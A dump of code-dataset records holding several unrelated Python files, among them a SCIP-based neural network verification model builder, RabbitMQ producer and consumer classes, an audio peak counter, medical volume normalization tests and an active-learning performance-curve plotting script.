bfs_dist(self.graph, next(iter(self.input_nodes))).items():\n if dist >= len(self.layers):\n self.layers.append(set())\n self.layers[dist].add(node)\n self.layers[0].update(self.input_nodes)\n\n for i, s in enumerate(self.layers):\n self.layers[i] = sorted(s)\n\n num_fixed = 0\n for layer_index, layer_nodes in enumerate(self.layers):\n\n if use_symbolic:\n temp_values = self.bound_comp.update_symbolic_bounds(layer_nodes, use_approximation=True,\n compare_with_global=False)\n\n for node_name in layer_nodes:\n\n if node_name in self.relu_nodes:\n # this is filled in dnn_bound_prop, the dict will map node_number to the constraints\n self.relu_cons[node_name] = {}\n\n relu_in_name, relu_out_name, bias, variable_names, coeffs = self.relu_nodes[node_name]\n lb, ub = self.compute_linear_bounds(variable_names, coeffs)\n lb += bias\n ub += bias\n\n relu_out = self.model.addVar(name=relu_out_name) # output of ReLU with lb=0\n relu_in = self.model.addVar(name=relu_in_name, lb=lb, ub=ub)\n\n self.vars[node_name] = relu_out\n self.vars[node_name + \"_in\"] = relu_in\n self.relu_in_nodes[node_name + \"_in\"] = relu_in\n\n\n self.model.addCons(relu_in == bias + self.quicksum_from_var_names(variable_names, coeffs),\n name=node_name + \"_in\")\n\n if optimize_nodes and abs(ub) + abs(lb) < 200:\n self.model.setObjective(relu_in)\n self.model.optimize()\n stat = self.model.getStatus()\n new_lb = self.model.getDualbound()\n\n self.model.freeTransform()\n\n self.model.setObjective(relu_in, sense=\"maximize\")\n self.model.optimize()\n new_ub = self.model.getDualbound()\n\n self.model.freeTransform()\n\n\n\n elif use_symbolic:\n new_lb = max(lb, temp_values[node_name][0])\n new_ub = min(ub, temp_values[node_name][1])\n\n else:\n new_lb = lb\n new_ub = ub\n\n\n new_lb -= self.eps\n new_ub += self.eps\n\n self.model.tightenVarLbGlobal(relu_in, new_lb)\n self.model.tightenVarUbGlobal(relu_in, new_ub)\n\n # add the ReLU (approximation or binary) constraint for newly added node to the model\n if new_lb < 0 < new_ub:\n self.model.tightenVarUbGlobal(relu_out, new_ub)\n self.model.addCons(relu_out >= relu_in, name=node_name + \"_relu_lb\")\n\n if linear_model:\n factor = new_ub / (new_ub - new_lb)\n self.delete_cons.append(self.model.addCons(relu_out + new_lb * factor <= relu_in * factor,\n name=node_name + \"_lin_approx\"))\n else:\n\n d = self.model.addVar(ub=1, vtype=\"B\", name=\"bin_\" + node_name)\n self.binary_variables[\"bin_\" + node_name] = d\n c1 = self.model.addCons(relu_out <=\n relu_in - (1 - d) * (new_lb + self.eps), name=node_name + \"_bin_lb\")\n c2 = self.model.addCons(relu_out <= d * (new_ub + self.eps), name=node_name + \"_bin_ub\")\n\n elif new_ub <= 0:\n num_fixed += 1\n self.model.fixVar(relu_out, 0)\n self.fixed_negative[node_name] = relu_out\n\n elif new_lb >= 0:\n num_fixed += 1\n self.model.addCons(relu_out == relu_in, name=node_name + \"_fix_pos\")\n self.model.tightenVarLbGlobal(relu_out, new_lb)\n self.model.tightenVarUbGlobal(relu_out, new_ub)\n self.fixed_positive[node_name] = relu_out\n\n elif node_name in self.linear_nodes:\n bias, variable_names, coeffs = self.linear_nodes[node_name]\n lb, ub = self.compute_linear_bounds(variable_names, coeffs)\n\n linear = self.model.addVar(name=node_name, lb=lb+bias, ub=ub+bias)\n self.model.addCons(linear == bias + self.quicksum_from_var_names(variable_names, coeffs),\n name=node_name + \"_linear\")\n self.vars[node_name] = linear\n\n elif node_name in self.max_pool_nodes:\n max_pool = self.model.addVar(name=node_name, lb=None)\n variables = [self.vars[var_name] for var_name in self.max_pool_nodes[node_name]]\n self.vars[node_name] = max_pool\n M = max(v.getUbGlobal() for v in variables)\n self.model.chgVarUbGlobal(max_pool, M)\n self.model.chgVarLbGlobal(max_pool, min(v.getLbGlobal() for v in variables))\n if linear_model:\n self.add_cons_maxpool_linear(variables, max_pool, [v.getLbGlobal() for v in variables], node_name)\n else:\n self.add_cons_maxpool(variables, max_pool, M, name=node_name)\n\n # end of current layer\n # here we assume that all ReLU layers contain only RelU nodes\n\n print(num_fixed, \"variables fixed\")\n\n\n if optimize_nodes:\n self.model.setObjective(0.0)\n self.model.hideOutput(quiet=False)\n\n # currently AssertOr is only supported if opt_mode = True\n if not opt_mode:\n for lhs, operator, elements in self.output_cons:\n assert elements[0] == \"AssertOut\", \"AssertOr only supported in opt_mode\"\n if not operator:\n self.model.addCons(lhs <= self.quicksum_coeff_var(elements))\n else:\n self.model.addCons(lhs >= self.quicksum_coeff_var(elements))\n\n\n\n def _build_output_cons(self, lhs, operator, elements, name, opt_mode):\n \"\"\"Build an output constraint and add it to self.graph. Also added to the model if opt_mode is True.\n\n Args:\n lhs: float, left hand side of the constraint\n operator: bool, indicates the direction of the operator\n elements: list, elements as saved in self.output_cons\n name: str, name that constraint shall have\n opt_mode: bool, is opt_mode used?\n\n Returns:\n float, float -- the lower and upper bound of the constraint neuron (to be used if opt_mode == True)\n \"\"\"\n\n var_name = name\n variable_names, coeffs = self.get_vars_and_coefficients(elements, str_only=True)\n self.output_variables[var_name] = variable_names, coeffs, operator, lhs\n if opt_mode:\n out_var = self.model.addVar(var_name, lb=None, ub=None)\n self.vars[var_name] = out_var\n\n variables = [self.vars[v] for v in variable_names]\n lb, ub = self.compute_linear_bounds(variable_names, coeffs)\n\n if operator:\n if opt_mode:\n self.model.addCons(out_var == self.quicksum_coeff_var(elements) - lhs, name=var_name)\n self.model.chgVarUbGlobal(out_var, ub - lhs)\n self.model.chgVarLbGlobal(out_var, lb - lhs)\n ub_return = ub - lhs\n lb_return = lb - lhs\n self.graph.add_node(var_name, node_type=\"linear_opt\", bias=-lhs)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v.name, var_name, weight=w)\n\n else:\n if opt_mode:\n self.model.addCons(out_var == lhs - self.quicksum_coeff_var(elements), name=var_name)\n self.model.chgVarUbGlobal(out_var, lhs - lb)\n self.model.chgVarLbGlobal(out_var, lhs - ub)\n ub_return = lhs - lb\n lb_return = lhs - ub\n # in this case we have to switch the sign of all coefficients\n self.graph.add_node(var_name, node_type=\"linear_opt\", bias=lhs)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v.name, var_name, weight=-w)\n\n return lb_return, ub_return\n\n\n def add_optimize_constraints(self, opt_mode):\n \"\"\"We always need this function to build the pytorch model correctly. Only if opt_mode == True,\n the optimize cons are added to the SCIP model.\n Add constraints as in PLNN paper to model verification as optimization problem. Needs that the dict\n self.output_cons is filled correctly with all output constraints.\n\n Notice that in the rlv-Files the AssertOut lines are not the properties, but the inverse properties. In the\n PLNN paper, they talk about the actual (not inverse) properties. If the original properties are conjunctions,\n then the inverted properties are disjunctions.\n\n Args:\n opt_mode: bool, should the opt constraints be added to the SCIP model?\n \"\"\"\n\n upper_bounds = []\n lower_bounds = []\n\n for i, (lhs, operator, elements) in enumerate(self.output_cons):\n if elements[0] == \"AssertOr\":\n assert opt_mode, \"AssertOr only allowed in opt_mode\"\n self.verify_or_constraints = True\n lb, ub = self._build_output_cons(lhs, operator, elements, \"output_cons_or_\" + str(i), opt_mode)\n lower_bounds.append(lb)\n upper_bounds.append(ub)\n\n elif elements[0] == \"AssertOut\":\n lb, ub = self._build_output_cons(lhs, operator, elements, \"output_cons_\" + str(i), opt_mode)\n lower_bounds.append(lb)\n upper_bounds.append(ub)\n\n else:\n raise TypeError(\"Error with AssertOut and Or\")\n\n self.graph.add_node(\"t\", node_type=\"max_pool_opt\")\n self.graph.add_edges_from(((v, \"t\") for v in self.output_variables), weight=1)\n\n # add max pool \"node\" that enforces all output constraints\n if opt_mode:\n self.objective_variable = self.model.addVar(name=\"t\", lb=None)\n self.model.chgVarUbGlobal(self.objective_variable, max(upper_bounds))\n self.model.chgVarLbGlobal(self.objective_variable, max(lower_bounds))\n\n self.add_cons_maxpool([self.vars[v] for v in self.output_variables], self.objective_variable,\n max(upper_bounds), name=\"max_pool_opt\")\n\n # if we verify or constraints, we switch the optimization direction since there is a minus sign that\n # must be simulated\n self.model.setObjective(-self.objective_variable if self.verify_or_constraints else self.objective_variable)\n\n\n def add_binary_constraints(self, delete_cons=True):\n \"\"\"Add Relu and max pool constraints after using the function optimize_bounds_lp.\n relu_out >= relu_in constraints are not added in this function, and should therefore not\n be contained in self.delete_cons. Also adds the maxpool constraint for the optimization\n approach, if self.objective variable exists.\n\n Args:\n delete_cons: bool, if True, the linear approximation constraints are deleted,\n otherwise they remain in the problem formulation\n \"\"\"\n\n if delete_cons:\n for cons in self.delete_cons:\n self.model.delCons(cons)\n\n for node_name in self.nodes_sorted:\n\n if node_name in self.relu_nodes and \\\n node_name not in self.fixed_positive and node_name not in self.fixed_negative:\n relu_in, relu_out, bias, variable_names, coeffs = self.relu_nodes[node_name]\n relu_in = self.vars[relu_in]\n relu_out = self.vars[relu_out]\n\n lb = relu_in.getLbGlobal()\n ub = relu_in.getUbGlobal()\n d = self.model.addVar(ub=1, vtype=\"B\", name=\"bin_\" + node_name)\n self.binary_variables[\"bin_\" + node_name] = d\n c1 = self.model.addCons(relu_out <= relu_in - (1 - d) * (lb - self.eps), name=node_name + \"_bin_lb\")\n c2 = self.model.addCons(relu_out <= d * (ub + self.eps), name=node_name + \"_bin_ub\")\n #self.relu_cons[node_name] = c1, c2\n\n if lb >= 0:\n self.model.chgVarLbGlobal(self.binary_variables[\"bin_\" + node_name], 1)\n if ub <= 0:\n self.model.chgVarUbGlobal(self.binary_variables[\"bin_\" + node_name], 0)\n\n elif node_name in self.max_pool_nodes:\n variables = [self.vars[var] for var in self.max_pool_nodes[node_name]]\n\n M = max(v.getUbGlobal() for v in variables)\n self.add_cons_maxpool(variables, self.vars[node_name], M, name=node_name)\n\n\n\n def build_pytorch_model(self):\n \"\"\"Builds a neural net class for pytorch use. Can only be called after self.graph was created\n in add_further_constraints().\n \"\"\"\n\n layer_type_list = []\n for i, layer_nodes in enumerate(self.layers):\n\n layer_size = len(layer_nodes)\n layer_sample_node_type = self.graph.node[next(iter(layer_nodes))][\"node_type\"]\n if layer_sample_node_type in [\"linear\", \"relu_out\", \"max_pool\"]:\n layer_type_list.append((layer_sample_node_type, layer_size, i))\n for j, n in enumerate(layer_nodes):\n self.node_position_pytorch[n] = (len(layer_type_list) - 1, j)\n elif layer_sample_node_type in [\"relu_in\", \"input\"]:\n pass\n else:\n raise TypeError(\"Layer type not correct or not supported, was \" + layer_sample_node_type)\n\n class NNClass(torch.nn.Module):\n \"\"\"Class for the pytorch model.\n Args:\n num_inputs: int, number of input neurons\n\n \"\"\"\n def __init__(self, num_inputs, num_output_cons=None, opt_mode=False):\n \"\"\"\n Args:\n num_inputs: int, number of input neurons\n num_output_cons: int, number of output constraints, is only used in opt mode\n opt_mode: bool, should the pytorch network be constructed including the opt neurons\n \"\"\"\n\n super(NNClass, self).__init__()\n last_size = num_inputs\n self.opt_mode = opt_mode\n\n for i, (layer_type, layer_size, _) in enumerate(layer_type_list):\n if layer_type in [\"linear\", \"relu_out\"]:\n setattr(self, str(i) + \"_\" + layer_type, torch.nn.Linear(last_size, layer_size))\n elif layer_type == \"max_pool\":\n assert layer_size == 1, \"More than one max pool node per layer currently not supported, see TODO\"\n setattr(self, str(i) + \"_\" + layer_type, torch.nn.MaxPool1d(last_size)) # last_size = kernel_size\n else:\n raise TypeError(\"Wrong layer type.\")\n last_size = layer_size\n\n # we always add the \"optimization neurons\" to the pytorch model since these help to\n # find primal solutions using the heuristic\n assert num_output_cons > 0, \"Number of outputs must be given in order to use opt mode.\"\n setattr(self, str(len(layer_type_list)) + \"_linear_opt\", torch.nn.Linear(last_size, num_output_cons))\n setattr(self, str(len(layer_type_list) + 1) + \"_max_pool_opt\", torch.nn.MaxPool1d(num_output_cons))\n\n def forward(self, x):\n\n for i, (layer_type, layer_size, _) in enumerate(layer_type_list):\n if layer_type == \"max_pool\":\n x = x.view(1, 1, -1)\n x = getattr(self, str(i) + \"_\" + layer_type)(x)\n if layer_type == \"relu_out\":\n x = torch.nn.functional.relu(x)\n\n # we always add the \"optimization neurons\" to the pytorch model since these help to\n # find primal solutions using the heuristic\n x = getattr(self, str(len(layer_type_list)) + \"_linear_opt\")(x)\n x = x.view(1, 1, -1)\n x = getattr(self, str(len(layer_type_list) + 1) + \"_max_pool_opt\")(x)\n return x\n\n self.pytorch_model = NNClass(len(self.input_nodes), len(self.output_variables), True)\n\n print(self.pytorch_model.state_dict().keys())\n state_dict = OrderedDict()\n\n # here we only support neuron predecessors from the layer immediately before\n # would require some substantial changes to the pytorch access to change this\n for torch_index, (layer_type, layer_size, orig_index) in enumerate(layer_type_list):\n if layer_type == \"max_pool\":\n continue # for max pool layers we don't have to create a pytorch tensor\n layer_weights = []\n layer_biases = []\n for el in self.layers[orig_index]: # + 1 to skip input layer\n pred_weights = []\n if layer_type == \"relu_out\":\n predecessors = set(self.graph.predecessors(el + \"_in\"))\n for possible_pred in self.layers[orig_index - 2]: # skip the relu_in layer\n if possible_pred in predecessors:\n predecessors.remove(possible_pred)\n pred_weights.append(self.graph.edges[possible_pred, el + \"_in\"][\"weight\"])\n else:\n pred_weights.append(0)\n layer_biases.append(self.graph.node[el + \"_in\"][\"bias\"])\n\n\n elif layer_type == \"linear\":\n predecessors = set(self.graph.predecessors(el))\n for possible_pred in self.layers[orig_index - 1]:\n if possible_pred in predecessors:\n predecessors.remove(possible_pred)\n pred_weights.append(self.graph.edges[possible_pred, el][\"weight\"])\n else:\n pred_weights.append(0)\n layer_biases.append(self.graph.node[el][\"bias\"])\n\n layer_weights.append(pred_weights)\n assert len(predecessors) == 0, \"set of predecessors not empty, i.e. predecessor from previous layer\"\n\n state_dict[str(torch_index) + \"_\" + layer_type + \".weight\"] = torch.FloatTensor(layer_weights)\n state_dict[str(torch_index) + \"_\" + layer_type + \".bias\"] = torch.FloatTensor(layer_biases)\n\n if True: # use_opt_mode\n layer_weights = []\n layer_biases = []\n for el in self.output_variables:\n pred_weights = []\n predecessors = set(self.graph.predecessors(el))\n for possible_pred in self.layers[-1]: # works only with constraints on output variables,\n # not on other variables\n if possible_pred in predecessors:\n predecessors.remove(possible_pred)\n pred_weights.append(self.graph.edges[possible_pred, el][\"weight\"])\n else:\n pred_weights.append(0)\n layer_biases.append(self.graph.node[el][\"bias\"])\n layer_weights.append(pred_weights)\n\n state_dict[str(len(layer_type_list)) + \"_linear_opt.weight\"] = torch.FloatTensor(layer_weights)\n state_dict[str(len(layer_type_list)) + \"_linear_opt.bias\"] = torch.FloatTensor(layer_biases)\n\n self.pytorch_model.load_state_dict(state_dict)\n self.pytorch_model.eval()\n\n\n def add_relu_branching(self, **kwargs):\n self.model.includeBranchrule(ReluBranching(self),\n \"relu_branch_rule\", \"branch on ReLU nodes\", **kwargs)\n\n def add_domain_branching(self, opt_mode, split_mode, **kwargs):\n self.model.includeBranchrule(DomainBranching(self, opt_mode, split_mode),\n \"domain_branch_rule\", \"branch input domains\", **kwargs)\n\n def add_sampling_heuristic(self, freq, maxdepth, **kwargs):\n self.model.includeHeur(SamplingHeuristic(self, **kwargs),\n \"sampling_heuristic\", \"try random solutions\", \"s\", freq=freq, maxdepth=maxdepth)\n\n def add_sampling_heuristic_local(self, freq, maxdepth, **kwargs):\n self.model.includeHeur(SamplingHeuristic(self, use_local_bounds=True, **kwargs),\n \"sampling_heuristic_local\", \"try random locally\", \"l\",\n priority=100000, freq=freq, maxdepth=maxdepth)\n\n def add_relu_sepa(self, priority=10, freq=1, maxbounddist=1.0, delay=False):\n self.model.includeSepa(ReluSepa(self), \"relu_sepa\", \"ideal separation\", priority=priority, freq=freq,\n maxbounddist=maxbounddist, delay=delay)\n\n def add_dnn_bound_prop(self, opt_mode, optimize_nodes, obbt_2, use_symbolic, bound_for_opt, maxdepth, use_genvbounds, **kwargs):\n if opt_mode:\n from dnn_bound_prop_opt import DNNBoundProp\n else:\n from dnn_bound_prop_nonopt import DNNBoundProp\n prop = DNNBoundProp(self, optimize_nodes, obbt_2, use_symbolic, bound_for_opt, maxdepth, use_genvbounds, **kwargs)\n self.model.includeProp(prop,\n \"use lp approximation\", \"bound tightening for domain branching\",\n presolpriority=1000,\n presolmaxrounds=0, proptiming=SCIP_PROPTIMING.AFTERLPLOOP,\n priority=9999999, freq=1, delay=True,\n presoltiming=SCIP_PRESOLTIMING.EXHAUSTIVE)\n return prop\n\n def add_eventhdlr_debug(self):\n \"\"\"Detect bound change events for debugging purposes.\n Put the variable in question as parameter to .getTransformedVar. SCIP_EVENTTYPE can be set to\n UBTIGHTENED or LBTIGHTENED\"\"\"\n self.debug_bound_hdlr = LbChangeEvent()\n self.model.includeEventhdlr(self.debug_bound_hdlr, \"ub change\", \"t\")\n\n\n def add_eventhdlr_dualbound(self):\n self.dualbound_hdlr_feas = DualBoundEvent(self)\n self.model.includeEventhdlr(self.dualbound_hdlr_feas, \"dualbound_feas\", \"check dualbound value\")\n self.dualbound_hdlr_infeas = DualBoundEvent(self)\n self.model.includeEventhdlr(self.dualbound_hdlr_infeas, \"dualbound_infeas\", \"check dualbound value\")\n\n def catch_events(self):\n \"\"\"Must be called to activate event handlers. Not necessary for eventhdlr_debug.\"\"\"\n if self.dualbound_hdlr_feas is not None and self.dualbound_hdlr_infeas is not None:\n self.model.catchEvent(SCIP_EVENTTYPE.NODEINFEASIBLE, self.dualbound_hdlr_infeas)\n self.model.catchEvent(SCIP_EVENTTYPE.NODEFEASIBLE, self.dualbound_hdlr_feas)\n print(\"caught event handler dualbound\")\n if self.local_search_hdlr is not None:\n self.model.catchEvent(SCIP_EVENTTYPE.BESTSOLFOUND, self.local_search_hdlr)\n print(\"caught \")\n if self.debug_bound_hdlr is not None:\n self.model.catchVarEvent(self.model.getTransformedVar(self.vars[\"relu_1X30\"]),\n SCIP_EVENTTYPE.UBTIGHTENED, self.debug_bound_hdlr)\n\n\n \n\n\n","sub_path":"src/model_boundd.py","file_name":"model_boundd.py","file_ext":"py","file_size_in_byte":39131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498005360","text":"\nfrom scipy.io import wavfile\n \nclass AudioAnalysis(object):\n \n PEAK_VALUE_THRESHOLD = 0.5\n PEAK_COUNT_THRESHOLD = 1000\n \n def is_rich(self, wave_file):\n \n # read voice file\n rate, data = wavfile.read(wave_file)\n data = data / (2.**15)\n \n # get number of peaks\n peaks = 0\n for val in data:\n if val > self.PEAK_VALUE_THRESHOLD:\n peaks += 1\n \n # return True if sound is rich (i.e. many peaks)\n if peaks > self.PEAK_COUNT_THRESHOLD:\n return True\n \n # otherwise return False\n return False\n","sub_path":"PyAudio/Research/AudioAnalyser/AudioAnalysis.py","file_name":"AudioAnalysis.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"246262100","text":"from unet3d.normalize import perform_clahe\nimport nibabel as nib\nfrom unet3d.normalize import normalize_volume\nfrom unet3d.utils.utils import save_nib\n\n\nfrom unet3d.utils.path_utils import get_workspace_path\n\nis_desktop = False\n\nsave_dir = get_workspace_path(is_desktop)\n\ntemp_volume_path = save_dir + \"volume.nii.gz\"\ntemp_template_path = save_dir + \"template.nii.gz\"\ntemp_volume_norm01_path = save_dir + \"norm01.nii.gz\"\ntemp_volume_normz_path = save_dir + \"normz.nii.gz\"\ntemp_volume_norm01_hist_path = save_dir + \"norm01_hist.nii.gz\"\ntemp_volume_normz_hist_path = save_dir + \"normz_hist.nii.gz\"\ntemp_volume_clahe_path = save_dir + \"volume_clahe.nii.gz\"\n\nvolume = nib.load(temp_volume_path)\nvolume = volume.get_data()\ntemplate = nib.load(temp_template_path)\n\naffine = template.affine\ntemplate = template.get_data()\n# save_nib(volume, temp_volume_path, affine)\n\n\nvolume_norm01 = normalize_volume(volume, template,\n is_normalize=\"01\",\n is_hist_match=\"0\")\nsave_nib(volume_norm01, temp_volume_norm01_path, affine)\n\n\nvolume_normz = normalize_volume(volume, template,\n is_normalize=\"z\",\n is_hist_match=\"0\")\nsave_nib(volume_normz, temp_volume_normz_path, affine)\n\n\nvolume_norm01_hist = normalize_volume(volume, template,\n is_normalize=\"01\",\n is_hist_match=\"1\")\nsave_nib(volume_norm01_hist, temp_volume_norm01_hist_path, affine)\n\n\nvolume_normz_hist = normalize_volume(volume, template,\n is_normalize=\"z\",\n is_hist_match=\"1\")\nsave_nib(volume_normz_hist, temp_volume_normz_hist_path, affine)\n\n\n# import numpy as np\n# source = volume\n\n# # reshape to 1d\n# H, W, D = source.shape\n# source_2d = source.reshape((H, W*D))\n\n\n# volume_clahe = perform_clahe(source_2d, clip_limit=0.002)\n# volume_clahe = volume_clahe.reshape(source.shape)\n# save_nib(volume_clahe, temp_volume_clahe_path, affine)\n\n\n# save_nib(template, temp_template_path, affine)\n# save_nib(volume_normalized, temp_volume_norm_path, affine)\n# save_nib(volume_normalized-volume, temp_diff_path, affine)\n","sub_path":"tests/test_norm.py","file_name":"test_norm.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"7339907","text":"\nimport argparse, shelve, os\nfrom argparse import Namespace\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .train_scheduler import TrainScheduler\nfrom .utils import load_optimal, load_baseline\nfrom . import help_text as ht\n\ndef abs_path(p):\n return os.path.join(os.path.dirname(__file__), p)\n\ndef plot_curves(order, xs, evaluation_set, search_model_seed, eval_model_seed, data_seed,\n batchsize, max_epoch, patience, tot_acq, use_gpus, workers_per_gpu, baselines):\n legends = []\n spec = f'{search_model_seed} {eval_model_seed} {data_seed} {batchsize} {max_epoch} {patience} {tot_acq}'\n with shelve.open(abs_path('statistics/perf_curves.shv')) as curves:\n if spec in curves and curves[spec]['order'] == order:\n optimal_curve = curves[spec][evaluation_set]\n else:\n eval_args = Namespace(model_seed=eval_model_seed, data_seed=data_seed, batchsize=batchsize,\n max_epoch=max_epoch, patience=patience, evaluation_set=evaluation_set,\n tot_acq=tot_acq, use_gpus=use_gpus, workers_per_gpu=workers_per_gpu)\n scheduler = TrainScheduler(eval_args)\n optimal_curve = scheduler.evaluate_order(order)\n plt.plot(xs, optimal_curve, 'C3-o')\n legends.append(f'Optimal: {np.mean(optimal_curve):0.3f}')\n for name, display_name, color in baselines:\n try:\n curve = load_baseline(name, evaluation_set, eval_model_seed, data_seed,\n batchsize, max_epoch, patience, tot_acq)['curve']\n plt.plot(xs, curve, f'C{color}-o')\n legends.append(f'{display_name}: {np.mean(curve):0.3f}')\n except:\n print(f'{display_name} not found')\n plt.legend(legends)\n return optimal_curve\n\ndef main(search_model_seed=0, eval_model_seed=None, data_seed=0, tot_acq=250, batchsize=25, max_epoch=100, patience=20,\n use_gpus='all', workers_per_gpu=1, log_dir='logs'):\n if eval_model_seed is None:\n eval_model_seed = search_model_seed\n\n N_warmstart = 50\n optimal_order, optimal_quality, _ = load_optimal(log_dir, search_model_seed, data_seed,\n batchsize, max_epoch, patience, tot_acq)\n print(f'optimal quality in log: {optimal_quality}')\n\n plt.figure(figsize=[7.5, 4])\n xs = list(range(N_warmstart, N_warmstart + tot_acq + 1, batchsize))\n baselines = [('min-confidence', 'Min-Confidence', 0), ('normalized-min-confidence', 'Norm.-Min-Conf.', 1),\n ('longest', 'Longest', 2), ('random', 'Random', 4)]\n plot_args = [search_model_seed, eval_model_seed, data_seed, batchsize, max_epoch, patience,\n tot_acq, use_gpus, workers_per_gpu, baselines]\n\n plt.subplot(1, 2, 1)\n valid_curve = plot_curves(optimal_order, xs, 'valid', *plot_args)\n xmin1, xmax1, ymin1, ymax1 = plt.axis()\n plt.xticks(np.linspace(N_warmstart, tot_acq + N_warmstart, 6))\n plt.xlabel('# Data Points')\n plt.ylabel('F1')\n plt.title('Validation Set $\\\\mathcal{D}^V$')\n ax1 = plt.gca()\n\n plt.subplot(1, 2, 2)\n test_curve = plot_curves(optimal_order, xs, 'test', *plot_args)\n xmin2, xmax2, ymin2, ymax2 = plt.axis()\n plt.yticks([])\n plt.xticks(np.linspace(N_warmstart, tot_acq + N_warmstart, 6))\n plt.xlabel('# Data Points')\n ax2 = plt.gca()\n plt.title('Test Set $\\\\mathcal{D}^T$')\n\n ax1.set_xlim(min(xmin1, xmin2), max(xmax1, xmax2))\n ax1.set_ylim(min(ymin1, ymin2), max(ymax1, ymax2))\n ax2.set_xlim(min(xmin1, xmin2), max(xmax1, xmax2))\n ax2.set_ylim(min(ymin1, ymin2), max(ymax1, ymax2))\n plt.tight_layout()\n fn = f'../figures/named_entity_recognition/perf_curves/s{search_model_seed}_e{eval_model_seed}.pdf'\n plt.savefig(abs_path(fn), bbox_inches='tight')\n\n print(f'Validation quality: {np.mean(valid_curve)}; Test quality: {np.mean(test_curve)}')\n\n spec = f'{search_model_seed} {eval_model_seed} {data_seed} {batchsize} {max_epoch} {patience} {tot_acq}'\n with shelve.open(abs_path('statistics/perf_curves.shv')) as curves:\n curves[spec] = {'valid': valid_curve, 'test': test_curve, 'order': optimal_order}\n\ndef main_cli():\n parser = argparse.ArgumentParser(description='Plot performance curve')\n parser.add_argument('--search-model-seed', type=int, default=0, help=ht.search_model_seed)\n parser.add_argument('--eval-model-seed', type=int, help=ht.eval_model_seed)\n parser.add_argument('--data-seed', type=int, default=0, help=ht.data_seed)\n parser.add_argument('--batchsize', type=int, default=25, help=ht.batchsize)\n parser.add_argument('--max-epoch', type=int, default=100, help=ht.max_epoch)\n parser.add_argument('--patience', type=int, default=20, help=ht.patience)\n parser.add_argument('--tot-acq', type=int, default=250, help=ht.tot_acq)\n parser.add_argument('--log-dir', type=str, default='logs', help=ht.log_dir)\n parser.add_argument('--use-gpus', type=str, default='all', help=ht.use_gpus)\n parser.add_argument('--workers-per-gpu', type=int, default=1, help=ht.workers_per_gpu)\n args = parser.parse_args()\n main(**vars(args))\n\nif __name__ == '__main__':\n main_cli()\n","sub_path":"named_entity_recognition/performance_curve.py","file_name":"performance_curve.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"562636617","text":"import pika\nimport sys\nfrom config import RABBITMQ_HOST, RABBITMQ_PORT\nimport json\nfrom time import sleep\nimport threading\n\n \n\nclass consumerMQ:\n\n internal_lock = threading.Lock()\n\n def __init__(self, queue, data_processing = lambda ch, method, properties, body: ch.basic_ack(delivery_tag = method.delivery_tag)):\n self.queue = queue\n self.data_processing = data_processing\n self.connection = None\n self.channel = None\n self.create_connection()\n result = self.channel.queue_declare(\n queue=self.queue,\n durable=True,\n passive=True\n )\n print(result)\n thread = threading.Thread(target=self._process_data_events)\n thread.setDaemon(True)\n thread.start()\n \n def __del__(self):\n if self.connection != None:\n self.connection.close()\n\n\n def _process_data_events(self):\n self.channel.basic_consume(\n queue=self.queue,\n on_message_callback=self.data_processing\n )\n\n while True:\n with self.internal_lock:\n self.connection.process_data_events()\n sleep(0.1)\n \n def create_connection(self):\n while self.connection == None or self.connection.is_closed:\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=RABBITMQ_HOST,\n port=RABBITMQ_PORT\n )\n )\n sleep(0.1)\n self.create_channel()\n \n def create_channel(self):\n while self.channel == None or self.channel.is_closed:\n self.channel = self.connection.channel()\n sleep(0.1)\n\n\nclass producerMQ:\n def __init__(self, queue):\n self.queue = queue\n self.connection = None\n self.channel = None\n self.create_connection()\n \n def declare_queue(self):\n queueName = ''\n while queueName != self.queue:\n result = self.channel.queue_declare(\n queue=self.queue,\n durable=True\n )\n queueName = result.method.queue\n sleep(0.1)\n\n def create_connection(self):\n while self.connection == None or self.connection.is_closed:\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=RABBITMQ_HOST,\n port=RABBITMQ_PORT\n )\n )\n sleep(0.1)\n self.create_channel()\n \n def create_channel(self):\n while self.channel == None or self.channel.is_closed:\n self.channel = self.connection.channel()\n sleep(0.1)\n self.declare_queue()\n\n def publish_message(self, body):\n print(body)\n if self.channel.is_open:\n try:\n self.channel.basic_publish(\n exchange = '',\n routing_key = self.queue,\n body=body,\n properties = pika.BasicProperties(\n delivery_mode = 2,\n )\n )\n except:\n print(\"Unable to push the message to queue {}\".format(self.queue))\n else:\n print('{} queue is not binded. Trying to get connection'.format(self.queue))\n\n def __del__(self):\n if self.connection != None:\n self.connection.close()\n\n \n\n","sub_path":"pixelgram-metadata-service/app/rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"59817887","text":"from sys import argv\nimport nltk\nimport re\n#script, filename = argv\nk=0\npos = open(\"pos.txt\",'r')\nneg = open(\"neg.txt\",'r')\nwhile(k != 10):\n\tfil = open(str(k),'w')\n\ti=0\n\tj=0\n\twhile(i != 80):\n\t\tline = pos.readline()\n\t\tlis = line.split()\n\t\tlis.append(\"1\")\n\t\tline = \" \".join(lis)\n\t\tfil.write(line)\n\t\tfil.write(\"\\n\")\n\t\tline = neg.readline()\n\t\tlis = line.split()\n\t\tlis.append(\"0\")\n\t\tline = \" \".join(lis)\n\t\tfil.write(line)\n\t\tfil.write(\"\\n\")\n\t\ti = i+1\n\tfil.close()\n\tk=k+1\n","sub_path":"cross.py","file_name":"cross.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"189244103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 21 09:56:24 2021\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport random\r\nimport itertools\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\nrootpath = 